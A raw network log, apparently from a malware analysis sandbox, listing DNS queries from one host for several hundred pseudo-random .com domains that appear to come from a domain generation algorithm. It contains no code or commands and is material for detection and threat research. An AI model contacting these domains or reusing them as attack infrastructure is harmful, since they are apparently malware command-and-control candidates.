                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856795073 CET192.168.2.61.1.1.10xbd16Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856971025 CET192.168.2.61.1.1.10x39c9Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.858042002 CET192.168.2.61.1.1.10xe71dStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.858042002 CET192.168.2.61.1.1.10x47fbStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.859110117 CET192.168.2.61.1.1.10x7287Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.859719038 CET192.168.2.61.1.1.10x47c0Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860060930 CET192.168.2.61.1.1.10xbf77Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860277891 CET192.168.2.61.1.1.10xa46fStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860716105 CET192.168.2.61.1.1.10x51c7Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.860940933 CET192.168.2.61.1.1.10x1cf7Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862004995 CET192.168.2.61.1.1.10x7201Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862004995 CET192.168.2.61.1.1.10x74d1Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.862668037 CET192.168.2.61.1.1.10x5e8dStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.863270044 CET192.168.2.61.1.1.10xdaeaStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.865431070 CET192.168.2.61.1.1.10x1a46Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.866702080 CET192.168.2.61.1.1.10xbea1Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.867305994 CET192.168.2.61.1.1.10x7ebfStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.868217945 CET192.168.2.61.1.1.10xab76Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.868768930 CET192.168.2.61.1.1.10x288aStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.871107101 CET192.168.2.61.1.1.10x328bStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.871107101 CET192.168.2.61.1.1.10x7c01Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.873013020 CET192.168.2.61.1.1.10x6975Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.874579906 CET192.168.2.61.1.1.10x197Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.876377106 CET192.168.2.61.1.1.10x925eStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.879574060 CET192.168.2.61.1.1.10xf75eStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.879574060 CET192.168.2.61.1.1.10x7860Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.881223917 CET192.168.2.61.1.1.10xf737Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.882647038 CET192.168.2.61.1.1.10x6ca5Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.884524107 CET192.168.2.61.1.1.10x28aStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.886239052 CET192.168.2.61.1.1.10xe484Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.888320923 CET192.168.2.61.1.1.10x6202Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.890258074 CET192.168.2.61.1.1.10xd614Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.890980959 CET192.168.2.61.1.1.10xc17fStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.893294096 CET192.168.2.61.1.1.10x8f7aStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.893294096 CET192.168.2.61.1.1.10x6470Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.894844055 CET192.168.2.61.1.1.10x4eb2Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.895268917 CET192.168.2.61.1.1.10x47edStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.895834923 CET192.168.2.61.1.1.10xcd96Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.896425009 CET192.168.2.61.1.1.10x5e6bStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.898469925 CET192.168.2.61.1.1.10x2c29Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.898469925 CET192.168.2.61.1.1.10xf229Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.899246931 CET192.168.2.61.1.1.10x5fe1Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.901226997 CET192.168.2.61.1.1.10xb9faStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.901583910 CET192.168.2.61.1.1.10x7a4aStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.903148890 CET192.168.2.61.1.1.10x5c0cStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.903148890 CET192.168.2.61.1.1.10x6c4aStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.904652119 CET192.168.2.61.1.1.10x75cdStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.905456066 CET192.168.2.61.1.1.10x1836Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.905951023 CET192.168.2.61.1.1.10xc196Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.907182932 CET192.168.2.61.1.1.10x174aStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.907182932 CET192.168.2.61.1.1.10xa0c4Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908123016 CET192.168.2.61.1.1.10xa354Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908818007 CET192.168.2.61.1.1.10x8fb6Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.908976078 CET192.168.2.61.1.1.10xf3cfStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.539639950 CET192.168.2.61.1.1.10x884bStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.546529055 CET192.168.2.61.1.1.10x9c1fStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.553680897 CET192.168.2.61.1.1.10xe3feStandard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.554414988 CET192.168.2.61.1.1.10xdf2dStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.554748058 CET192.168.2.61.1.1.10xc9a2Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.558689117 CET192.168.2.61.1.1.10x6f63Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.561511993 CET192.168.2.61.1.1.10x32b6Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.564273119 CET192.168.2.61.1.1.10x4651Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.564970970 CET192.168.2.61.1.1.10x6d5fStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.565929890 CET192.168.2.61.1.1.10x6d92Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568120956 CET192.168.2.61.1.1.10xb6f4Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568183899 CET192.168.2.61.1.1.10x9663Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.568700075 CET192.168.2.61.1.1.10xf14dStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569200039 CET192.168.2.61.1.1.10x378eStandard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569232941 CET192.168.2.61.1.1.10x6992Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.569973946 CET192.168.2.61.1.1.10x4465Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.574381113 CET192.168.2.61.1.1.10xea40Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.580322981 CET192.168.2.61.1.1.10xae38Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.584772110 CET192.168.2.61.1.1.10x274dStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:44.585496902 CET192.168.2.61.1.1.10xe888Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791868925 CET192.168.2.61.1.1.10xbdc0Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.791919947 CET192.168.2.61.1.1.10x6c7bStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.792515993 CET192.168.2.61.1.1.10xd465Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793056011 CET192.168.2.61.1.1.10xff3dStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793256998 CET192.168.2.61.1.1.10xc297Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.793782949 CET192.168.2.61.1.1.10x4aa7Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.794481993 CET192.168.2.61.1.1.10x1a1eStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET192.168.2.61.1.1.10x9eddStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795114994 CET192.168.2.61.1.1.10xd4eStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795332909 CET192.168.2.61.1.1.10x3a9aStandard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.795732975 CET192.168.2.61.1.1.10x794fStandard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796230078 CET192.168.2.61.1.1.10x3075Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.796538115 CET192.168.2.61.1.1.10x38a5Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET192.168.2.61.1.1.10xcbcStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.797743082 CET192.168.2.61.1.1.10x28eeStandard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.798877001 CET192.168.2.61.1.1.10x909fStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.802298069 CET192.168.2.61.1.1.10x864eStandard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.805553913 CET192.168.2.61.1.1.10x572aStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810758114 CET192.168.2.61.1.1.10x91e1Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810889959 CET192.168.2.61.1.1.10xa0c3Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.810983896 CET192.168.2.61.1.1.10x26deStandard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.811141014 CET192.168.2.61.1.1.10xdb5bStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.813178062 CET192.168.2.61.1.1.10x8faaStandard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.822571039 CET192.168.2.61.1.1.10x412fStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.824213982 CET192.168.2.61.1.1.10x7d0dStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.829044104 CET192.168.2.61.1.1.10xa70eStandard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891077995 CET192.168.2.61.1.1.10xffb3Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891304970 CET192.168.2.61.1.1.10x66c0Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.891304970 CET192.168.2.61.1.1.10x62e3Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.905599117 CET192.168.2.61.1.1.10xe03Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.905925035 CET192.168.2.61.1.1.10xbc19Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.912528038 CET192.168.2.61.1.1.10x7960Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.912803888 CET192.168.2.61.1.1.10x42c7Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913223028 CET192.168.2.61.1.1.10x9118Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913480043 CET192.168.2.61.1.1.10xc1d4Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913669109 CET192.168.2.61.1.1.10xd8a1Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913810968 CET192.168.2.61.1.1.10x357Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.913934946 CET192.168.2.61.1.1.10xdcddStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.914103985 CET192.168.2.61.1.1.10x6b8aStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.914402008 CET192.168.2.61.1.1.10x5655Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.916198015 CET192.168.2.61.1.1.10x6771Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.916887045 CET192.168.2.61.1.1.10x3512Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.920756102 CET192.168.2.61.1.1.10x7270Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.920908928 CET192.168.2.61.1.1.10x624bStandard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.921113968 CET192.168.2.61.1.1.10x59f2Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924185991 CET192.168.2.61.1.1.10xb230Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924339056 CET192.168.2.61.1.1.10x1eeStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924525023 CET192.168.2.61.1.1.10x1f27Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.924673080 CET192.168.2.61.1.1.10x259bStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.925576925 CET192.168.2.61.1.1.10x7153Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.925825119 CET192.168.2.61.1.1.10x8411Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.926532984 CET192.168.2.61.1.1.10x5789Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927221060 CET192.168.2.61.1.1.10x2629Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927222013 CET192.168.2.61.1.1.10x97caStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.927551031 CET192.168.2.61.1.1.10x9fc0Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.932332039 CET192.168.2.61.1.1.10x2942Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.932332039 CET192.168.2.61.1.1.10x7d88Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.945259094 CET192.168.2.61.1.1.10xbefStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.945724010 CET192.168.2.61.1.1.10xae77Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:45.948055029 CET192.168.2.61.1.1.10x576fStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.155175924 CET192.168.2.61.1.1.10x559eStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.155508995 CET192.168.2.61.1.1.10xa8bbStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.157488108 CET192.168.2.61.1.1.10xe0c3Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.157803059 CET192.168.2.61.1.1.10xfd8bStandard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.159032106 CET192.168.2.61.1.1.10xb1e5Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.159341097 CET192.168.2.61.1.1.10x133eStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.162229061 CET192.168.2.61.1.1.10x5f2fStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.163660049 CET192.168.2.61.1.1.10x98dcStandard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.179685116 CET192.168.2.61.1.1.10xf8cbStandard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.182977915 CET192.168.2.61.1.1.10x8d9Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.183232069 CET192.168.2.61.1.1.10xba8Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.183654070 CET192.168.2.61.1.1.10xb8aeStandard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.184726954 CET192.168.2.61.1.1.10x20b7Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.185482025 CET192.168.2.61.1.1.10xff6cStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.185816050 CET192.168.2.61.1.1.10xec4bStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.189827919 CET192.168.2.61.1.1.10x8e00Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.195554972 CET192.168.2.61.1.1.10x7fb0Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.204651117 CET192.168.2.61.1.1.10x5995Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.207564116 CET192.168.2.61.1.1.10x9f43Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.208877087 CET192.168.2.61.1.1.10x5eb5Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.213505983 CET192.168.2.61.1.1.10xd4d7Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.223346949 CET192.168.2.61.1.1.10xb37Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.225126982 CET192.168.2.61.1.1.10x12aeStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:46.246642113 CET192.168.2.61.1.1.10xd396Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.437319040 CET192.168.2.61.1.1.10x7305Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.437546968 CET192.168.2.61.1.1.10xb707Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.443262100 CET192.168.2.61.1.1.10x63e7Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.449141979 CET192.168.2.61.1.1.10xe7b9Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.451913118 CET192.168.2.61.1.1.10x7365Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456053019 CET192.168.2.61.1.1.10x90b3Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.456732988 CET192.168.2.61.1.1.10x8d49Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458127975 CET192.168.2.61.1.1.10xa862Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.458564997 CET192.168.2.61.1.1.10xcc35Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460107088 CET192.168.2.61.1.1.10xde1bStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.460827112 CET192.168.2.61.1.1.10xfb7cStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.469893932 CET192.168.2.61.1.1.10xee5dStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.470716000 CET192.168.2.61.1.1.10x158fStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471797943 CET192.168.2.61.1.1.10x8acfStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.471995115 CET192.168.2.61.1.1.10xb2e5Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472156048 CET192.168.2.61.1.1.10x50e6Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.472409964 CET192.168.2.61.1.1.10xe31eStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.476733923 CET192.168.2.61.1.1.10x7b7eStandard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477016926 CET192.168.2.61.1.1.10x45aaStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477226019 CET192.168.2.61.1.1.10xe1dbStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477245092 CET192.168.2.61.1.1.10x39aaStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477442980 CET192.168.2.61.1.1.10xf184Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:47.477581978 CET192.168.2.61.1.1.10xc0a1Standard query (0)qexykav.comA (IP address)IN (0x0001)false
